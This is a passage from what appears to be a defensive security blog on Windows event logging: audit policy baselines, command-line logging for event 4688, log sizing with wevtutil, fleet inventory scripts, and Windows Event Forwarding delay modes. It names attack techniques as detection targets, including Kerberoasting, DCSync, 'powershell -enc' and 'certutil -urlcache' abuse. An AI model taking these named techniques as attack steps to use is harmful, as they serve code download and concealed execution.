etc.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Non Sensitive Privilege Use             No Auditing    ← Usually intentional (noisy)</span><br></span></code></pre></div></div>\n<p>Scripted audit across your fleet:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Collect audit policy from multiple remote machines and compare against baseline</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$targetHosts = @(\"DC01\", \"DC02\", \"SERVER01\", \"WSADMIN01\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$results = @()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($host in $targetHosts) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    try {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $output = Invoke-Command -ComputerName $host -ScriptBlock {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $raw = auditpol /get /category:* /r  # CSV format</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $raw | ConvertFrom-Csv</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        } -ErrorAction Stop</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        foreach ($row in $output) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $results += [PSCustomObject]@{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                ComputerName  = $host</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                Category      = $row.'Category/Subcategory'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                Setting       = $row.'Inclusion Setting'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    } catch {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Warning \"Failed to query $host : $_\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Find hosts where \"Credential Validation\" is NOT audited</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$results | Where-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $_.Category -like \"*Credential Validation*\" -and</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $_.Setting -eq \"No Auditing\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">} | Select-Object ComputerName, Category, Setting</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Export full comparison</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$results | Export-Csv \"audit_policy_fleet.csv\" -NoTypeInformation</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"23-the-subcategories-that-must-be-enabled-and-why\">2.3 The Subcategories That Must Be Enabled (And Why)<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#23-the-subcategories-that-must-be-enabled-and-why\" class=\"hash-link\" aria-label=\"Direct link to 2.3 The Subcategories That Must Be Enabled (And Why)\" title=\"Direct link to 2.3 The Subcategories That Must Be Enabled (And Why)\" translate=\"no\">​</a></h3>\n<p>The following table maps the subcategories most critical for detection to the specific attack techniques they cover. This is the minimum baseline for a detection-capable environment:</p>\n<table><thead><tr><th>Subcategory</th><th>Event IDs</th><th>Covers</th><th>Default State</th></tr></thead><tbody><tr><td>Credential Validation</td><td>4776, 4768, 4771</td><td>NTLM auth, Kerberos TGT, pre-auth failure</td><td>❌ Disabled on many systems</td></tr><tr><td>Kerberos Service Ticket Operations</td><td>4769</td><td>Kerberoasting, silver ticket</td><td>⚠ Success only (miss failures)</td></tr><tr><td>Process Creation</td><td>4688</td><td>All process executions</td><td>❌ Disabled by default</td></tr><tr><td>Process Termination</td><td>4689</td><td>Timeline reconstruction</td><td>❌ Disabled by default</td></tr><tr><td>DPAPI Activity</td><td>4693, 4694</td><td>Credential decryption by malware</td><td>❌ Disabled by default</td></tr><tr><td>Special Logon</td><td>4672</td><td>Admin-equivalent logon (SeDebug, etc.)</td><td>❌ Disabled on many systems</td></tr><tr><td>Sensitive Privilege Use</td><td>4673, 4674</td><td>Privilege escalation evidence</td><td>❌ Disabled by default</td></tr><tr><td>Security Group Management</td><td>4728, 4732, 4756</td><td>Group membership changes</td><td>✅ Enabled on DCs</td></tr><tr><td>Directory Service Access</td><td>4661, 4662</td><td>DCSync, object access on AD</td><td>⚠ Often disabled (high volume)</td></tr><tr><td>Directory Service Changes</td><td>5136, 5137, 5141</td><td>AD object creation/modification</td><td>⚠ Sometimes disabled</td></tr><tr><td>Audit Policy Change</td><td>4719</td><td>Someone changing audit policy</td><td>⚠ Often disabled</td></tr><tr><td>Filtering Platform Connection</td><td>5156, 5158</td><td>Network connections per process</td><td>❌ Disabled  extremely noisy</td></tr><tr><td>Other Object Access</td><td>4698, 4700, 4702</td><td>Scheduled task creation</td><td>❌ Disabled on many systems</td></tr></tbody></table>\n<p><strong>Critical: enabling Process Creation (4688) with command-line logging</strong></p>\n<p>Event 4688 logs process creation, but without an additional registry setting, the command line is NOT included  making the event largely useless for detecting LOLBin abuse, PowerShell attacks, or anything that relies on command-line arguments:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Enable command-line logging in process creation events (4688)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># This must be set SEPARATELY from the audit policy subcategory</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$registryPath = \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">if (-not (Test-Path $registryPath)) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    New-Item -Path $registryPath -Force | Out-Null</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Set-ItemProperty -Path $registryPath `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    -Name \"ProcessCreationIncludeCmdLine_Enabled\" `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    -Value 1 -Type DWord</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Verify the setting applied:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-ItemProperty -Path $registryPath -Name \"ProcessCreationIncludeCmdLine_Enabled\"</span><br></span></code></pre></div></div>\n<p>Without this registry value, you will see 4688 events with <code>CommandLine: -</code>  an empty command line. Every rule you write for detecting <code>powershell -enc</code>, <code>certutil -urlcache</code>, or <code>wmic</code> abuse will silently never fire.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-3--log-size-the-most-common-cause-of-overwriting\">Part 3  Log Size: The Most Common Cause of Overwriting<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#part-3--log-size-the-most-common-cause-of-overwriting\" class=\"hash-link\" aria-label=\"Direct link to Part 3  Log Size: The Most Common Cause of Overwriting\" title=\"Direct link to Part 3  Log Size: The Most Common Cause of Overwriting\" translate=\"no\">​</a></h2>\n<p>The default log sizes for Windows security channels are laughably inadequate for enterprise environments with active security audit policies:</p>\n<table><thead><tr><th>Log Channel</th><th>Windows Default Max Size</th><th>Events Per Day (busy DC)</th><th>Retention at Default</th></tr></thead><tbody><tr><td>Security</td><td>20 MB</td><td>500,000–2,000,000+</td><td>&lt; 1 hour</td></tr><tr><td>System</td><td>20 MB</td><td>10,000–50,000</td><td>8–24 hours</td></tr><tr><td>Application</td><td>20 MB</td><td>5,000–20,000</td><td>1–3 days</td></tr><tr><td>PowerShell/Operational</td><td>15 MB</td><td>20,000–200,000</td><td>1–4 hours</td></tr><tr><td>Sysmon/Operational</td><td>20 MB</td><td>200,000–1,000,000+</td><td>Minutes</td></tr></tbody></table>\n<p>A busy domain controller generating 1 million Security events per day will overwrite its 20MB Security log roughly every 2 minutes.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"31-setting-appropriate-log-sizes\">3.1 Setting Appropriate Log Sizes<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#31-setting-appropriate-log-sizes\" class=\"hash-link\" aria-label=\"Direct link to 3.1 Setting Appropriate Log Sizes\" title=\"Direct link to 3.1 Setting Appropriate Log Sizes\" translate=\"no\">​</a></h3>\n<div class=\"language-cmd codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-cmd codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Set Security log to 4GB (recommended for DCs with active audit policies)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wevtutil sl Security /ms:4294967296</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Set Sysmon operational log to 2GB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wevtutil sl Microsoft-Windows-Sysmon/Operational /ms:2147483648</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Set PowerShell operational log to 1GB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wevtutil sl Microsoft-Windows-PowerShell/Operational /ms:1073741824</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Set Application log to 500MB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wevtutil sl Application /ms:524288000</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Set System log to 500MB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wevtutil sl System /ms:524288000</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Verify the change took effect:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wevtutil gl Security</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Output includes:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: maxSize: 4294967296</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: retention: false    ← \"false\" = overwrite as needed (correct setting)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: autoBackup: false</span><br></span></code></pre></div></div>\n<p>Deploying via GPO (the right way to do this at scale):</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">GPO Path: Computer Configuration → Administrative Templates → </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          Windows Components → Event Log Service → Security</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Setting: \"Specify the maximum log file size (KB)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Value: 4194304   (= 4GB for DCs)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">       1048576   (= 1GB for servers)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">       512000    (= 500MB for workstations)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Setting: \"Control Event Log behavior when the log file reaches its maximum size\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Value: NOT configured (leave default overwrite behavior)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">       [Do NOT set \"Do not overwrite events\" unless you have extremely fast collection]</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"32-checking-current-log-status-across-your-fleet\">3.2 Checking Current Log Status Across Your Fleet<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#32-checking-current-log-status-across-your-fleet\" class=\"hash-link\" aria-label=\"Direct link to 3.2 Checking Current Log Status Across Your Fleet\" title=\"Direct link to 3.2 Checking Current Log Status Across Your Fleet\" translate=\"no\">​</a></h3>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Inventory log sizes, fill percentage, and oldest retained event across hosts</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$hosts = @(\"DC01\", \"DC02\", \"SERVER01\", \"SERVER02\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$logNames = @(\"Security\", \"System\", \"Microsoft-Windows-Sysmon/Operational\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              \"Microsoft-Windows-PowerShell/Operational\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$report = @()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($computer in $hosts) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    foreach ($logName in $logNames) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        try {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $log = Invoke-Command -ComputerName $computer -ScriptBlock {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                param($ln)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                $l = Get-WinEvent -ListLog $ln -ErrorAction SilentlyContinue</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                if ($l) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    [PSCustomObject]@{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        LogName       = $l.LogName</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        MaxSizeMB     = [math]::Round($l.MaximumSizeInBytes / 1MB, 1)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        CurrentSizeMB = [math]::Round($l.FileSize / 1MB, 1)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        FillPct       = [math]::Round(($l.FileSize / $l.MaximumSizeInBytes) * 100, 1)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        RecordCount   = $l.RecordCount</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        IsEnabled     = $l.IsEnabled</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        OldestRecord  = if ($l.RecordCount -gt 0) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                            (Get-WinEvent -LogName $ln -MaxEvents 1 -Oldest -ErrorAction SilentlyContinue).TimeCreated</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                        } else { $null }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            } -ArgumentList $logName -ErrorAction SilentlyContinue</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            if ($log) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                $log | Add-Member -NotePropertyName ComputerName -NotePropertyValue $computer</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                $report += $log</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        } catch {}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Flag any log retaining less than 24 hours of events</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$report | Where-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $_.OldestRecord -and</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ((Get-Date) - $_.OldestRecord).TotalHours -lt 24</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">} | Select-Object ComputerName, LogName, MaxSizeMB, FillPct, OldestRecord |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Format-Table -AutoSize</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Export full report</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$report | Export-Csv \"log_inventory.csv\" -NoTypeInformation</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-4--windows-event-forwarding-the-pipeline-that-silently-drops-events\">Part 4  Windows Event Forwarding: The Pipeline That Silently Drops Events<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#part-4--windows-event-forwarding-the-pipeline-that-silently-drops-events\" class=\"hash-link\" aria-label=\"Direct link to Part 4  Windows Event Forwarding: The Pipeline That Silently Drops Events\" title=\"Direct link to Part 4  Windows Event Forwarding: The Pipeline That Silently Drops Events\" translate=\"no\">​</a></h2>\n<p>For organizations using WEF/WEC rather than or in addition to a SIEM agent, the forwarding pipeline introduces additional failure modes that are largely invisible without explicit monitoring.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"41-wef-architecture-and-the-subscription-model\">4.1 WEF Architecture and the Subscription Model<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#41-wef-architecture-and-the-subscription-model\" class=\"hash-link\" aria-label=\"Direct link to 4.1 WEF Architecture and the Subscription Model\" title=\"Direct link to 4.1 WEF Architecture and the Subscription Model\" translate=\"no\">​</a></h3>\n<p>WEF uses WinRM (port 5985 HTTP / 5986 HTTPS) to transport events from source machines to a Windows Event Collector (WEC) server. The flow:</p>\n<!-- -->\n<p><strong>The bookmark mechanism  and how it fails:</strong></p>\n<p>WEC maintains a bookmark per source machine per subscription, tracking the last EventRecordID successfully forwarded. When a source reconnects after going offline, forwarding resumes from the bookmark. This sounds reliable. It has two critical failure modes:</p>\n<ol>\n<li class=\"\"><strong>The source's local log overwrote the bookmarked position.</strong> If the source was offline and its Security log overwrote itself before reconnecting, the WEC resumes from the bookmark  which no longer exists in the log. Events between last bookmark and current position are silently lost. The WEC receives no notification that a gap exists.</li>\n<li class=\"\"><strong>The bookmark itself is in the WEC registry and can be corrupted.</strong> If the WEC server crashes or the registry becomes inconsistent, bookmarks reset, causing either duplicate or missed events.</li>\n</ol>\n<p>Microsoft's own documentation acknowledges this explicitly:</p>\n<blockquote>\n<p>\"When the event log overwrites existing events (resulting in data loss if the device isn't connected to the Event Collector), there's no notification sent to the WEF collector that events are lost from the client. Neither is there an indicator that there was a gap encountered in the event stream.\"</p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"42-the-three-wef-delivery-optimization-modes\">4.2 The Three WEF Delivery Optimization Modes<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#42-the-three-wef-delivery-optimization-modes\" class=\"hash-link\" aria-label=\"Direct link to 4.2 The Three WEF Delivery Optimization Modes\" title=\"Direct link to 4.2 The Three WEF Delivery Optimization Modes\" translate=\"no\">​</a></h3>\n<p>WEF offers three delivery modes that trade latency for reliability. Most organizations leave the default, which is optimized for the wrong scenario:</p>\n<div class=\"language-cmd codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-cmd codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: View current subscription configuration</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wecutil gs \"BaselineSubscription\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: The \"DeliveryMaxLatency\" field controls delivery mode:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Normal     (default): 15 minutes delivery delay. Batches events.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::            Events buffered on source for up to 15 minutes.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::            During a 4-minute incident, you may see NO events in SIEM.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Minimize Latency:  30 seconds delivery delay.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::            Better for detection but higher WEC load.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Minimize Bandwidth: 6 hours delivery delay.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::            Clearly wrong for security use cases.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Set a subscription to Minimize Latency mode:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wecutil ss \"BaselineSubscription\" /cm:MinLatency</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Or set custom timing (delivery every 30 seconds, heartbeat every 60):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wecutil ss \"BaselineSubscription\" /cm:Custom /hi:60000 /dmi:30000</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Verify:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">wecutil gs \"BaselineSubscription\" | findstr -i 